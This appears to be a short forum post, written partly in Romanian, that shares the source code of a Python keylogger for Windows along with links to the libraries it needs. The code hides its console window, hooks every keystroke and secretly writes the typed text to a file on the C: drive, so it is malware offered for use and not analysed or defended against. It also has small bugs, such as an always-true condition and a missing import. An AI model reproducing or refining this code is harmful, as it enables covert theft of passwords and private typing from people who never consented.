Sper ca am postat bn daca nu rog sa se mute
KEYLOGGER SOURCECODE AND - Download Python:Python Programming Language – Official Website - Download Pyhook: pyhook.sourceforge.net - Download Python for Windows Extensions: Python for Windows extensions | Download Python for Windows extensions software for free at SourceForge.net SOURCE: import win32api import win32console import win32gui import pythoncom, pyHook win = win32console.GetConsoleWindow() win32gui.ShowWindow(win,0) def OnKeyboardEvent(event):    if event.Ascii==5:        _exit(1)    if event.Ascii != 0 or 8:        f=open('c:output.txt','r')        buffer=f.read()        f.close()        f=open('c:output.txt','w')        keylogs=chr(event.Ascii)        if event.Ascii==13:            keylogs='/n'        buffer += keylogs        f.write(buffer)        f.close() hm = pyHook.HookManager() hm.KeyDown = OnKeyboardEvent hm.HookKeyboard() pythoncom.PumpMessages()